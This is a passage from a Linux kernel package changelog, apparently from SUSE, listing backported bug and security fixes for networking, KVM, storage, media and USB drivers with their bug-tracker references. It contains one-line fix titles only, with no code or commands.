Fix an uninitialized variable warning (bnc#1012382).\n - em28xx: only use mt9v011 if camera support is enabled (bnc#1012382).\n - enable DST_CACHE in non-vanilla configs except s390x/zfcpdump\n - ext4: correct documentation for grpid mount option (bnc#1012382).\n - ext4: do not unnecessarily allocate buffer in recently_deleted()\n (bsc#1080344).\n - ext4: Fix data exposure after failed AIO DIO (bsc#1069135 bsc#1082864).\n - ext4: save error to disk in __ext4_grp_locked_error() (bnc#1012382).\n - f2fs: fix a bug caused by NULL extent tree (bsc#1082478). While this fs\n is not supported by SLE it affects opensuse users so let's add it to our\n kernel for opensuse merging.\n - fbdev: auo_k190x: avoid unused function warnings (bnc#1012382).\n - fbdev: s6e8ax0: avoid unused function warnings (bnc#1012382).\n - fbdev: sis: enforce selection of at least one backend (bnc#1012382).\n - fbdev: sm712fb: avoid unused function warnings (bnc#1012382).\n - flow_dissector: Check skb for VLAN only if skb specified (bsc#1042286).\n - flow_dissector: fix vlan tag handling (bsc#1042286).\n - flow_dissector: For stripped vlan, get vlan info from skb->vlan_tci\n (bsc#1042286).\n - ftrace: Remove incorrect setting of glob search field (bnc#1012382).\n - geneve: fix populating tclass in geneve_get_v6_dst (bsc#1042286).\n - genirq/msi: Add stubs for get_cached_msi_msg/pci_write_msi_msg\n (bnc#1012382).\n - genksyms: Fix segfault with invalid declarations (bnc#1012382).\n - gianfar: fix a flooded alignment reports because of padding issue\n (bnc#1012382).\n - go7007: add MEDIA_CAMERA_SUPPORT dependency (bnc#1012382).\n - gpio: ath79: add missing MODULE_DESCRIPTION/LICENSE (bnc#1012382).\n - gpio: intel-mid: Fix build warning when !CONFIG_PM (bnc#1012382).\n - gpio: iop: add missing MODULE_DESCRIPTION/AUTHOR/LICENSE (bnc#1012382).\n - gpio: xgene: mark PM functions as __maybe_unused (bnc#1012382).\n - grace: replace BUG_ON by WARN_ONCE in exit_net hook (bnc#1012382).\n - gre: build header correctly for collect metadata tunnels (bsc#1042286).\n - gre: do not assign header_ops in collect metadata mode (bsc#1042286).\n - gre: do not keep the GRE header around in collect medata mode\n (bsc#1042286).\n - gre: reject GUE and FOU in collect metadata mode (bsc#1042286).\n - hdpvr: hide unused variable (bnc#1012382).\n - hid: quirks: Fix keyboard + touchpad on Toshiba Click Mini not working\n (bnc#1012382).\n - hippi: Fix a Fix a possible sleep-in-atomic bug in rr_close\n (bnc#1012382).\n - hrtimer: Ensure POSIX compliance (relative CLOCK_REALTIME hrtimers)\n (bnc#1012382).\n - hwmon: (pmbus) Use 64bit math for DIRECT format values (bnc#1012382).\n - hwrng: exynos - use __maybe_unused to hide pm functions (bnc#1012382).\n - i2c: remove __init from i2c_register_board_info() (bnc#1012382).\n - ib/ipoib: Fix race condition in neigh creation (bnc#1012382).\n - ib/mlx4: Fix incorrectly releasing steerable UD QPs when have only ETH\n ports (bnc#1012382).\n - ib/mlx4: Fix mlx4_ib_alloc_mr error flow (bnc#1012382).\n - ibmvnic: Account for VLAN header length in TX buffers (bsc#1085239).\n - ibmvnic: Account for VLAN tag in L2 Header descriptor (bsc#1085239).\n - ibmvnic: Allocate max queues stats buffers (bsc#1081498).\n - ibmvnic: Allocate statistics buffers during probe (bsc#1082993).\n - ibmvnic: Check for NULL skb's in NAPI poll routine (bsc#1081134,\n git-fixes).\n - ibmvnic: Clean RX pool buffers during device close (bsc#1081134).\n - ibmvnic: Clean up device close (bsc#1084610).\n - ibmvnic: Correct goto target for tx irq initialization failure\n (bsc#1082223).\n - ibmvnic: Do not attempt to login if RX or TX queues are not allocated\n (bsc#1082993).\n - ibmvnic: Do not disable device during failover or partition migration\n (bsc#1084610).\n - ibmvnic: Ensure that buffers are NULL after free (bsc#1080014).\n - ibmvnic: Fix early release of login buffer (bsc#1081134, git-fixes).\n - ibmvnic: fix empty firmware version and errors cleanup (bsc#1079038).\n - ibmvnic: fix firmware version when no firmware level has been provided\n by the VIOS server (bsc#1079038).\n - ibmvnic: Fix login buffer memory leaks (bsc#1081134).\n - ibmvnic: Fix NAPI structures memory leak (bsc#1081134).\n - ibmvnic: Fix recent errata commit (bsc#1085239).\n - ibmvnic: Fix rx queue cleanup for non-fatal resets (bsc#1080014).\n - ibmvnic: Fix TX descriptor tracking again (bsc#1082993).\n - ibmvnic: Fix TX descriptor tracking (bsc#1081491).\n - ibmvnic: Free and re-allocate scrqs when tx/rx scrqs change\n (bsc#1081498).\n - ibmvnic: Free RX socket buffer in case of adapter error (bsc#1081134).\n - ibmvnic: Generalize TX pool structure (bsc#1085224).\n - ibmvnic: Handle TSO backing device errata (bsc#1085239).\n - ibmvnic: Harden TX/RX pool cleaning (bsc#1082993).\n - ibmvnic: Improve TX buffer accounting (bsc#1085224).\n - ibmvnic: Keep track of supplementary TX descriptors (bsc#1081491).\n - ibmvnic: Make napi usage dynamic (bsc#1081498).\n - ibmvnic: Move active sub-crq count settings (bsc#1081498).\n - ibmvnic: Pad small packets to minimum MTU size (bsc#1085239).\n - ibmvnic: queue reset when CRQ gets closed during reset (bsc#1080263).\n - ibmvnic: Remove skb->protocol checks in ibmvnic_xmit (bsc#1080384).\n - ibmvnic: Rename active queue count variables (bsc#1081498).\n - ibmvnic: Reorganize device close (bsc#1084610).\n - ibmvnic: Report queue stops and restarts as debug output (bsc#1082993).\n - ibmvnic: Reset long term map ID counter (bsc#1080364).\n - ibmvnic: Split counters for scrq/pools/napi (bsc#1082223).\n - ibmvnic: Update and clean up reset TX pool routine (bsc#1085224).\n - ibmvnic: Update release RX pool routine (bsc#1085224).\n - ibmvnic: Update TX and TX completion routines (bsc#1085224).\n - ibmvnic: Update TX pool initialization routine (bsc#1085224).\n - ibmvnic: Wait until reset is complete to set carrier on (bsc#1081134).\n - idle: i7300: add PCI dependency (bnc#1012382).\n - igb: Free IRQs when device is hotplugged (bnc#1012382).\n - iio: adc: axp288: remove redundant duplicate const on\n axp288_adc_channels (bnc#1012382).\n - iio: adis_lib: Initialize trigger before requesting interrupt\n (bnc#1012382).\n - iio: buffer: check if a buffer has been set up when poll is called\n (bnc#1012382).\n - input: tca8418_keypad - hide gcc-4.9 -Wmaybe-uninitialized warning\n (bnc#1012382).\n - input: tca8418_keypad - remove double read of key event register\n (git-fixes).\n - iommu/amd: Add align parameter to alloc_irq_index() (bsc#975772).\n - iommu/amd: Enforce alignment for MSI IRQs (bsc#975772).\n - iommu/amd: Fix alloc_irq_index() increment (bsc#975772).\n - iommu/vt-d: Use domain instead of cache fetching (bsc#975772).\n - ip6mr: fix stale iterator (bnc#1012382).\n - ipc/msg: introduce msgctl(MSG_STAT_ANY) (bsc#1072689).\n - ipc/sem: introduce semctl(SEM_STAT_ANY) (bsc#1072689).\n - ipc/shm: introduce shmctl(SHM_STAT_ANY) (bsc#1072689).\n - ip_tunnel: fix preempt warning in ip tunnel creation/updating\n (bnc#1012382).\n - ip_tunnel: replace dst_cache with generic implementation (bnc#1012382).\n - ipv4: allow local fragmentation in ip_finish_output_gso() (bsc#1042286).\n - ipv4: fix checksum annotation in udp4_csum_init (bsc#1042286).\n - ipv4: ipconfig: avoid unused ic_proto_used symbol (bnc#1012382).\n - ipv4: update comment to document GSO fragmentation cases (bsc#1042286).\n - ipv6: datagram: Refactor dst lookup and update codes to a new function\n (bsc#1042286).\n - ipv6: datagram: Refactor flowi6 init codes to a new function\n (bsc#1042286).\n - ipv6: datagram: Update dst cache of a connected datagram sk during pmtu\n update (bsc#1042286).\n - ipv6: fix checksum annotation in udp6_csum_init (bsc#1042286).\n - ipv6: icmp6: Allow icmp messages to be looped back (bnc#1012382).\n - ipv6/ila: fix nlsize calculation for lwtunnel (bsc#1042286).\n - ipv6: remove unused in6_addr struct (bsc#1042286).\n - ipv6: tcp: fix endianness annotation in tcp_v6_send_response\n (bsc#1042286).\n - ipv6: udp: Do a route lookup and update during release_cb (bsc#1042286).\n - ipvlan: Add the skb->mark as flow4's member to lookup route\n (bnc#1012382).\n - ipvlan: fix multicast processing (bsc#1042286).\n - ipvlan: fix various issues in ipvlan_process_multicast() (bsc#1042286).\n - irqchip/gic-v3: Use wmb() instead of smb_wmb() in gic_raise_softirq()\n (bnc#1012382).\n - isdn: eicon: reduce stack size of sig_ind function (bnc#1012382).\n - isdn: icn: remove a #warning (bnc#1012382).\n - isdn: sc: work around type mismatch warning (bnc#1012382).\n - jffs2: Fix use-after-free bug in jffs2_iget()'s error handling path\n (git-fixes).\n - kABI: protect struct cpuinfo_x86 (kabi).\n - kABI: protect struct ip_tunnel and reintroduce ip_tunnel_dst_reset_all\n (kabi).\n - kABI: reintroduce crypto_poly1305_setkey (kabi).\n - kabi: restore kabi after "net: replace dst_cache ip6_tunnel\n implementation with the generic one" (bsc#1082897).\n - kabi: restore nft_set_elem_destroy() signature (bsc#1042286).\n - kabi: restore rhashtable_insert_slow() signature (bsc#1042286).\n - kabi/severities: add __x86_indirect_thunk_rsp\n - kabi/severities: as per bsc#1068569 we can ignore XFS kabi The gods have\n spoken, let there be light.\n - kabi: uninline sk_receive_skb() (bsc#1042286).\n - kaiser: fix compile error without vsyscall (bnc#1012382).\n - kaiser: fix intel_bts perf crashes (bnc#1012382).\n - kasan: rework Kconfig settings (bnc#1012382).\n - kernel/async.c: revert "async: simplify lowest_in_progress()"\n (bnc#1012382).\n - kernel: fix rwlock implementation (bnc#1080360, LTC#164371).\n - kernfs: fix regression in kernfs_fop_write caused by wrong type\n (bnc#1012382).\n - keys: encrypted: fix buffer overread in valid_master_desc()\n (bnc#1012382).\n - kmemleak: add scheduling point to kmemleak_scan() (bnc#1012382).\n - kvm: add X86_LOCAL_APIC dependency (bnc#1012382).\n - kvm: arm/arm64: Check pagesize when allocating a hugepage at Stage 2\n (bsc#1079029).\n - kvm: nVMX: Fix kernel panics induced by illegal INVEPT/INVVPID types\n (bnc#1012382).\n - kvm: nVMX: Fix races when sending nested PI while dest enters/leaves L2\n (bnc#1012382).\n - kvm: nVMX: invvpid handling improvements (bnc#1012382).\n - kvm: nVMX: kmap() can't fail (bnc#1012382).\n - kvm: nVMX: vmx_complete_nested_posted_interrupt() can't fail\n (bnc#1012382).\n - kvm: PPC: Book3S PR: Fix svcpu copying with preemption enabled\n (bsc#1066223).\n - kvm: VMX: clean up declaration of VPID/EPT invalidation types\n (bnc#1012382).\n - kvm: VMX: Fix rflags cache during vCPU reset (bnc#1012382).\n - kvm: VMX: Make indirect call speculation safe (bnc#1012382).\n - kvm: x86: Do not re-execute instruction when not passing CR2 value\n (bnc#1012382).\n - kvm: x86: emulator: Return to user-mode on L1 CPL=0 emulation failure\n (bnc#1012382).\n - kvm: x86: fix escape of guest dr6 to the host (bnc#1012382).\n - kvm: X86: Fix operand/address-size during instruction decoding\n (bnc#1012382).\n - kvm: x86: ioapic: Clear Remote IRR when entry is switched to\n edge-triggered (bnc#1012382).\n - kvm: x86: ioapic: Fix level-triggered EOI and IOAPIC reconfigure race\n (bnc#1012382).\n - kvm: x86: ioapic: Preserve read-only values in the redirection table\n (bnc#1012382).\n - kvm: x86: Make indirect calls in emulator speculation safe (bnc#1012382).\n - kvm/x86: Reduce retpoline performance impact in\n slot_handle_level_range(), by always inlining iterator helper methods\n (bnc#1012382).\n - l2tp: fix use-after-free during module unload (bsc#1042286).\n - led: core: Fix brightness setting when setting delay_off=0 (bnc#1012382).\n - leds: do not overflow sysfs buffer in led_trigger_show (bsc#1080464).\n - lib/mpi: Fix umul_ppmm() for MIPS64r6 (bnc#1012382).\n - livepatch: introduce shadow variable API (bsc#1082299 fate#313296).\n Shadow variables support.\n - livepatch: __kgr_shadow_get_or_alloc() is local to shadow.c (bsc#1082299\n fate#313296). Shadow variables support.\n - lockd: fix "list_add double add" caused by legacy signal interface\n (bnc#1012382).\n - loop: fix concurrent lo_open/lo_release (bnc#1012382).\n - mac80211: fix the update of path metric for RANN frame (bnc#1012382).\n - mac80211: mesh: drop frames appearing to be from us (bnc#1012382).\n - Make DST_CACHE a silent config option (bnc#1012382).\n - mdio-sun4i: Fix a memory leak (bnc#1012382).\n - md/raid1: Use a new variable to count flighting sync\n requests(bsc#1078609)\n - media: cxusb, dib0700: ignore XC2028_I2C_FLUSH (bnc#1012382).\n - media: dvb-usb-v2: lmedm04: Improve logic checking of warm start\n (bnc#1012382).\n - media: dvb-usb-v2: lmedm04: move ts2020 attach to dm04_lme2510_tuner\n (bnc#1012382).\n - media: r820t: fix r820t_write_reg for KASAN (bnc#1012382).\n - media: s5k6aa: describe some function parameters (bnc#1012382).\n - media: soc_camera: soc_scale_crop: add missing\n MODULE_DESCRIPTION/AUTHOR/LICENSE (bnc#1012382).\n - media: ts2020: avoid integer overflows on 32 bit machines (bnc#1012382).\n - media: usbtv: add a new usbid (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: add missing VIDIOC_PREPARE_BUF\n (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: avoid sizeof(type) (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: copy clip list in put_v4l2_window32\n (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: copy m.userptr in put_v4l2_plane32\n (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: do not copy back the result for certain\n errors (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: drop pr_info for unknown buffer type\n (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: fix ctrl_is_pointer (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: fix the indentation (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: make ctrl_is_pointer work for subdevs\n (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: move 'helper' functions to\n __get/put_v4l2_format32 (bnc#1012382).\n - media: v4l2-compat-ioctl32: Copy v4l2_window->global_alpha (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: refactor compat ioctl32 logic\n (bnc#1012382).\n - media: v4l2-ioctl.c: do not copy back the result for -ENOTTY\n (bnc#1012382).\n - mips: Implement __multi3 for GCC7 MIPS64r6 builds (bnc#1012382).\n - mmc: bcm2835: Do not overwrite max frequency unconditionally\n (bsc#983145, git-fixes).\n - mm/early_ioremap: Fix boot hang with earlyprintk=efi,keep (bnc#1012382).\n - mm: hide a #warning for COMPILE_TEST (bnc#1012382).\n - mm/kmemleak.c: make cond_resched() rate-limiting more efficient\n (git-fixes).\n - mm: pin address_space before dereferencing it while isolating an LRU\n page (bnc#1081500).\n - mm,vmscan: Make unregister_shrinker() no-op if register_shrinker()\n failed (bnc#1012382).\n - mn10300/misalignment: Use SIGSEGV SEGV_MAPERR to report a failed user\n copy (bnc#1012382).\n - modsign: hide openssl output in silent builds (bnc#1012382).\n - module/retpoline: Warn about missing retpoline in module (bnc#1012382).\n - mpt3sas: Do not mark fw_event workqueue as WQ_MEM_RECLAIM (bsc#1078583).\n - mptfusion: hide unused seq_mpt_print_ioc_summary function (bnc#1012382).\n - mtd: cfi: convert inline functions to macros (bnc#1012382).\n - mtd: cfi: enforce valid geometry configuration (bnc#1012382).\n - mtd: ichxrom: maybe-uninitialized with gcc-4.9 (bnc#1012382).\n - mtd: maps: add __init attribute (bnc#1012382).\n - mtd: nand: brcmnand: Disable prefetch by default (bnc#1012382).\n - mtd: nand: denali_pci: add missing MODULE_DESCRIPTION/AUTHOR/LICENSE\n (bnc#1012382).\n - mtd: nand: Fix nand_do_read_oob() return value (bnc#1012382).\n - mtd: nand: gpmi: Fix failure when a erased page has a bitflip at BBM\n (bnc#1012382).\n - mtd: nand: sunxi: Fix ECC strength choice (bnc#1012382).\n - mtd: sh_flctl: pass FIFO as physical address (bnc#1012382).\n - mvpp2: fix multicast address filter (bnc#1012382).\n - ncpfs: fix unused variable warning (bnc#1012382).\n - ncr5380: shut up gcc indentation warning (bnc#1012382).\n - net: add dst_cache support (bnc#1012382).\n - net: arc_emac: fix arc_emac_rx() error paths (bnc#1012382).\n - net: avoid skb_warn_bad_offload on IS_ERR (bnc#1012382).\n - net: cdc_ncm: initialize drvflags before usage (bnc#1012382).\n - net: dst_cache_per_cpu_dst_set() can be static (bnc#1012382).\n - net: ena: add detection and recovery mechanism for handling\n missed/misrouted MSI-X (bsc#1083548).\n - net: ena: add new admin define for future support of IPv6 RSS\n (bsc#1083548).\n - net: ena: add power management ops to the ENA driver (bsc#1083548).\n - net: ena: add statistics for missed tx packets (bsc#1083548).\n - net: ena: fix error handling in ena_down() sequence (bsc#1083548).\n - net: ena: fix race condition between device reset and link up setup\n (bsc#1083548).\n - net: ena: fix rare kernel crash when bar memory remap fails\n (bsc#1083548).\n - net: ena: fix wrong max Tx/Rx queues on ethtool (bsc#1083548).\n - net: ena: improve ENA driver boot time (bsc#1083548).\n - net: ena: increase ena driver version to 1.3.0 (bsc#1083548).\n - net: ena: increase ena driver version to 1.5.0 (bsc#1083548).\n - net: ena: reduce the severity of some printouts (bsc#1083548).\n - net: ena: remove legacy suspend suspend/resume support (bsc#1083548).\n - net: ena: Remove redundant unlikely() (bsc#1083548).\n - net: ena: unmask MSI-X only after device initialization is completed\n (bsc#1083548).\n - net: ethernet: xilinx: Mark XILINX_LL_TEMAC broken on 64-bit\n (bnc#1012382).\n - netfilter: drop outermost socket lock in getsockopt() (bnc#1012382).\n - netfilter: ebtables: CONFIG_COMPAT: do not trust userland offsets\n (bsc#1085107).\n - netfilter: ebtables: fix erroneous reject of last rule (bsc#1085107).\n - netfilter: ipt_CLUSTERIP: fix out-of-bounds accesses in\n clusterip_tg_check() (bnc#1012382).\n - netfilter: ipvs: avoid unused variable warnings (bnc#1012382).\n - netfilter: nf_queue: Make the queue_handler pernet (bnc#1012382).\n - netfilter: nf_tables: fix a wrong check to skip the inactive rules\n (bsc#1042286).\n - netfilter: nf_tables: fix inconsistent element expiration calculation\n (bsc#1042286).\n - netfilter: nf_tables: fix *leak* when expr clone fail (bsc#1042286).\n - netfilter: nf_tables: fix race when create new element in dynset\n (bsc#1042286).\n - netfilter: on sockopt() acquire sock lock only in the required scope\n (bnc#1012382).\n - netfilter: tee: select NF_DUP_IPV6 unconditionally (bsc#1042286).\n - netfilter: x_tables: avoid out-of-bounds reads in\n xt_request_find_{match|target} (bnc#1012382).\n - netfilter: x_tables: fix int overflow in xt_alloc_table_info()\n (bnc#1012382).\n - netfilter: xt_RATEEST: acquire xt_rateest_mutex for hash insert\n (bnc#1012382).\n - netfilter: xt_socket: fix transparent match for IPv6 request sockets\n (bsc#1042286).\n - net: gianfar_ptp: move set_fipers() to spinlock protecting area\n (bnc#1012382).\n - net: hp100: remove unnecessary #ifdefs (bnc#1012382).\n - net: igmp: add a missing rcu locking section (bnc#1012382).\n - net/ipv4: Introduce IPSKB_FRAG_SEGS bit to inet_skb_parm.flags\n (bsc#1042286).\n - netlink: fix nla_put_{u8,u16,u32} for KASAN (bnc#1012382).\n - net: replace dst_cache ip6_tunnel implementation with the generic one\n (bnc#1012382).\n - net_sched: red: Avoid devision by zero (bnc#1012382).\n - net_sched: red: Avoid illegal values (bnc#1012382).\n - net: vxlan: lwt: Fix vxlan local traffic (bsc#1042286).\n - net: vxlan: lwt: Use source ip address during route lookup (bsc#1042286).\n - nfs: Add a cond_resched() to nfs_commit_release_pages() (bsc#1077779).\n - nfs: commit direct writes even if they fail partially (bnc#1012382).\n - nfsd: check for use of the closed special stateid (bnc#1012382).\n - nfsd: CLOSE SHOULD return the invalid special stateid for NFSv4.x (x>0)\n (bnc#1012382).\n - nfsd: Ensure we check stateid validity in the seqid operation checks\n (bnc#1012382).\n - nfs: Do not convert nfs_idmap_cache_timeout to jiffies (git-fixes).\n - nfs: fix a deadlock in nfs client initialization (bsc#1074198).\n - nfs/pnfs: fix nfs_direct_req ref leak when i/o falls back to the mds\n (bnc#1012382).\n - nfs: reject request for id_legacy key without auxdata (bnc#1012382).\n - nfs: Trunking detection should handle ERESTARTSYS/EINTR (bsc#1074198).\n - nvme: Fix managing degraded controllers (bnc#1012382).\n - ocfs2: return error when we attempt to access a dirty bh in jbd2\n (bsc#1012829).\n - openvswitch: fix the incorrect flow action alloc size (bnc#1012382).\n - ovl: fix failure to fsync lower dir (bnc#1012382).\n - ovs/geneve: fix rtnl notifications on iface deletion (bsc#1042286).\n - ovs/gre: fix rtnl notifications on iface deletion (bsc#1042286).\n - ovs/gre,geneve: fix error path when creating an iface (bsc#1042286).\n - ovs/vxlan: fix rtnl notifications on iface deletion (bsc#1042286).\n - pci/ASPM: Do not retrain link if ASPM not possible (bnc#1071892).\n - pci: keystone: Fix interrupt-controller-node lookup (bnc#1012382).\n - perf bench numa: Fixup discontiguous/sparse numa nodes (bnc#1012382).\n - perf top: Fix window dimensions change handling (bnc#1012382).\n - perf/x86: Shut up false-positive -Wmaybe-uninitialized warning\n (bnc#1012382).\n - pinctrl: sunxi: Fix A80 interrupt pin bank (bnc#1012382).\n - pipe: cap initial pipe capacity according to pipe-max-size limit\n (bsc#1045330).\n - pktcdvd: Fix pkt_setup_dev() error path (bnc#1012382).\n - platform/x86: intel_mid_thermal: Fix suspend handlers unused warning\n (bnc#1012382).\n - PM / devfreq: Propagate error from devfreq_add_device() (bnc#1012382).\n - PM / wakeirq: Fix unbalanced IRQ enable for wakeirq (bsc#1031717).\n - posix-timer: Properly check sigevent->sigev_notify (bnc#1012382).\n - power: bq27xxx_battery: mark some symbols __maybe_unused (bnc#1012382).\n - powerpc/64: Fix flush_(d|i)cache_range() called from modules\n (FATE#315275 LTC#103998 bnc#1012382 bnc#863764).\n - powerpc/64s: Fix RFI flush dependency on HARDLOCKUP_DETECTOR\n (bnc#1012382).\n - powerpc/64s: Improve RFI L1-D cache flush fallback (bsc#1068032,\n bsc#1075087).\n - powerpc: Do not preempt_disable() in show_cpuinfo() (bsc#1066223).\n - powerpc/numa: Invalidate numa_cpu_lookup_table on cpu remove\n (bsc#1081512).\n - powerpc/perf: Fix oops when grouping different pmu events (bnc#1012382).\n - powerpc/powernv: Fix MCE handler to avoid trashing CR0/CR1 registers\n (bsc#1066223).\n - powerpc/powernv: Move IDLE_STATE_ENTER_SEQ macro to cpuidle.h\n (bsc#1066223).\n - powerpc/powernv: Support firmware disable of RFI flush (bsc#1068032,\n bsc#1075087).\n - powerpc/pseries: Support firmware disable of RFI flush (bsc#1068032,\n bsc#1075087).\n - powerpc: Simplify module TOC handling (bnc#1012382).\n - power: reset: zx-reboot: add missing MODULE_DESCRIPTION/AUTHOR/LICENSE\n (bnc#1012382).\n - profile: hide unused functions when !CONFIG_PROC_FS (bnc#1012382).\n - Provide a function to create a NUL-terminated string from unterminated\n data (bnc#1012382).\n - pwc: hide unused label (bnc#1012382).\n - qla2xxx: asynchronous pci probing (bsc#1034503).\n - qlcnic: fix deadlock bug (bnc#1012382).\n - r8169: fix RTL8168EP take too long to complete driver initialization\n (bnc#1012382).\n - RDMA/cma: Make sure that PSN is not over max allowed (bnc#1012382).\n - reiserfs: avoid a -Wmaybe-uninitialized warning (bnc#1012382).\n - Revert "Bluetooth: btusb: fix QCA Rome suspend/resume" (bnc#1012382).\n - Revert "bpf: avoid false sharing of map refcount with max_entries"\n (kabi).\n - Revert "netfilter: nf_queue: Make the queue_handler pernet" (kabi).\n - Revert "net: replace dst_cache ip6_tunnel implementation with the\n generic one" (kabi bnc#1082897).\n - Revert "power: bq27xxx_battery: Remove unneeded dependency in Kconfig"\n (bnc#1012382).\n - Revert "powerpc: Simplify module TOC handling" (kabi).\n - Revert "x86/entry/64: Separate cpu_current_top_of_stack from TSS.sp0"\n This reverts commit 89ef3e2aec59362edf7b1cd1c48acc81cd74e319.\n - Revert "x86/entry/64: Use a per-CPU trampoline stack for IDT entries"\n This reverts commit 5812bed1a96b27804bfd1eadbe3e263cb58aafdf.\n - rfi-flush: Move the logic to avoid a redo into the debugfs code\n (bsc#1068032, bsc#1075087).\n - rfi-flush: Switch to new linear fallback flush (bsc#1068032,\n bsc#1075087).\n - rhashtable: add rhashtable_lookup_get_insert_key() (bsc#1042286).\n - rtc-opal: Fix handling of firmware error codes, prevent busy loops\n (bnc#1012382).\n - rtlwifi: fix gcc-6 indentation warning (bnc#1012382).\n - rtlwifi: rtl8821ae: Fix connection lost problem correctly (bnc#1012382).\n - s390/dasd: fix handling of internal requests (bsc#1080809).\n - s390/dasd: fix wrongly assigned configuration data (bnc#1012382).\n - s390/dasd: prevent prefix I/O error (bnc#1012382).\n - s390: fix handling of -1 in set{,fs}[gu]id16 syscalls (bnc#1012382).\n - sched/rt: Up the root domain ref count when passing it around via IPIs\n (bnc#1012382).\n - sched/rt: Use container_of() to get root domain in\n rto_push_irq_work_func() (bnc#1012382).\n - scripts/kernel-doc: Do not fail with status != 0 if error encountered\n with -none (bnc#1012382).\n - scsi: aacraid: Prevent crash in case of free interrupt during scsi EH\n path (bnc#1012382).\n - scsi: advansys: fix build warning for PCI=n (bnc#1012382).\n - scsi: advansys: fix uninitialized data access (bnc#1012382).\n - scsi: csiostor: fix use after free in csio_hw_use_fwconfig()\n (bsc#1005776).\n - scsi: fdomain: drop fdomain_pci_tbl when built-in (bnc#1012382).\n - scsi: ibmvfc: fix misdefined reserved field in ibmvfc_fcp_rsp_info\n (bnc#1012382).\n - SCSI: initio: remove duplicate module device table (bnc#1012382).\n - scsi: mvumi: use __maybe_unused to hide pm functions (bnc#1012382).\n - scsi: qla2xxx: Fix abort command deadlock due to spinlock (FATE#320146,\n bsc#966328).\n - scsi: qla2xxx: Remove aborting ELS IOCB call issued as part of timeout\n (FATE#320146, bsc#966328).\n - scsi: return correct blkprep status code in case scsi_init_io() fails\n (bsc#1082979).\n - scsi: sim710: fix build warning (bnc#1012382).\n - scsi: sr: workaround VMware ESXi cdrom emulation bug (bsc#1080813).\n - scsi: storvsc: Fix scsi_cmd error assignments in storvsc_handle_error\n (bnc#1012382).\n - scsi: sun_esp: fix device reference leaks (bsc#1082979).\n - scsi: ufs: ufshcd: fix potential NULL pointer dereference in\n ufshcd_config_vreg (bnc#1012382).\n - sctp: make use of pre-calculated len (bnc#1012382).\n - selinux: ensure the context is NUL terminated in\n security_context_to_sid_core() (bnc#1012382).\n - selinux: general protection fault in sock_has_perm (bnc#1012382).\n - selinux: skip bounded transition processing if the policy isn't loaded\n (bnc#1012382).\n - serial: 8250_mid: fix broken DMA dependency (bnc#1012382).\n - serial: 8250_uniphier: fix error return code in uniphier_uart_probe()\n (bsc#1031717).\n - serial: imx: Only wakeup via RTSDEN bit if the system has RTS/CTS\n (bnc#1012382).\n - sget(): handle failures of register_shrinker() (bnc#1012382).\n - signal/openrisc: Fix do_unaligned_access to send the proper signal\n (bnc#1012382).\n - signal/sh: Ensure si_signo is initialized in do_divide_error\n (bnc#1012382).\n - SolutionEngine771x: fix Ether platform data (bnc#1012382).\n - spi: atmel: fixed spin_lock usage inside atmel_spi_remove (bnc#1012382).\n - spi: imx: do not access registers while clocks disabled (bnc#1012382).\n - spi: sun4i: disable clocks in the remove function (bnc#1012382).\n - ssb: mark ssb_bus_register as __maybe_unused (bnc#1012382).\n - staging: android: ashmem: Fix a race condition in pin ioctls\n (bnc#1012382).\n - staging: iio: adc: ad7192: fix external frequency setting (bnc#1012382).\n - staging: rtl8188eu: Fix incorrect response to SIOCGIWESSID (bnc#1012382).\n - staging: ste_rmi4: avoid unused function warnings (bnc#1012382).\n - staging: unisys: visorinput depends on INPUT (bnc#1012382).\n - staging: wilc1000: fix kbuild test robot error (bnc#1012382).\n - SUNRPC: Allow connect to return EHOSTUNREACH (bnc#1012382).\n - tc1100-wmi: fix build warning when CONFIG_PM not enabled (bnc#1012382).\n - tc358743: fix register i2c_rd/wr function fix (git-fixes).\n - tc358743: fix register i2c_rd/wr functions (bnc#1012382).\n - tcp: do not set rtt_min to 1 (bsc#1042286).\n - tcp: release sk_frag.page in tcp_disconnect (bnc#1012382).\n - test_bpf: fix the dummy skb after dissector changes (bsc#1042286).\n - tg3: Add workaround to restrict 5762 MRRS to 2048 (bnc#1012382).\n - tg3: Enable PHY reset in MTU change path for 5720 (bnc#1012382).\n - thermal: fix INTEL_SOC_DTS_IOSF_CORE dependencies (bnc#1012382).\n - thermal: spear: use __maybe_unused for PM functions (bnc#1012382).\n - tlan: avoid unused label with PCI=n (bnc#1012382).\n - tools build: Add tools tree support for 'make -s' (bnc#1012382).\n - tty: cyclades: cyz_interrupt is only used for PCI (bnc#1012382).\n - tty: hvc_xen: hide xen_console_remove when unused (bnc#1012382).\n - tty: mxser: Remove ASYNC_CLOSING (bnc#1072363).\n - ubi: block: Fix locking for idr_alloc/idr_remove (bnc#1012382).\n - udp: restore UDPlite many-cast delivery (bsc#1042286).\n - usb: build drivers/usb/common/ when USB_SUPPORT is set (bnc#1012382).\n - USB: cdc-acm: Do not log urb submission errors on disconnect\n (bnc#1012382).\n - USB: cdc_subset: only build when one driver is enabled (bnc#1012382).\n - usb: dwc3: gadget: Set maxpacket size for ep0 IN (bnc#1012382).\n - usb: f_fs: Prevent gadget unbind if it is already unbound (bnc#1012382).\n - usb: gadget: do not dereference g until after it has been null checked\n (bnc#1012382).\n - usb: gadget: f_fs: Process all descriptors during bind (bnc#1012382).\n - usb: gadget: uvc: Missing files for configfs interface (bnc#1012382).\n - usbip: fix 3eee23c3ec14 tcp_socket address still in the status file\n (bnc#1012382).\n - usbip: keep usbip_device sockfd state in sync with tcp_socket\n (bnc#1012382).\n - usbip: list: do not list devices attached to vhci_hcd (bnc#1012382).\n - usbip: prevent bind loops on devices attached to vhci_hcd (bnc#1012382).\n - usbip: vhci_hcd: clear just the USB_PORT_STAT_POWER bit (bnc#1012382).\n - usb: ldusb: add PIDs for new CASSY devices supported by this driver\n (bnc#1012382).\n - usb: musb/ux500: remove duplicate check for dma_is_compatible\n (bnc#1012382).\n - usb: ohci: Proper handling of ed_rm_list to handle race condition\n between usb_kill_urb() and finish_unlinks() (bnc#1012382).\n - usb: option: Add support for FS040U 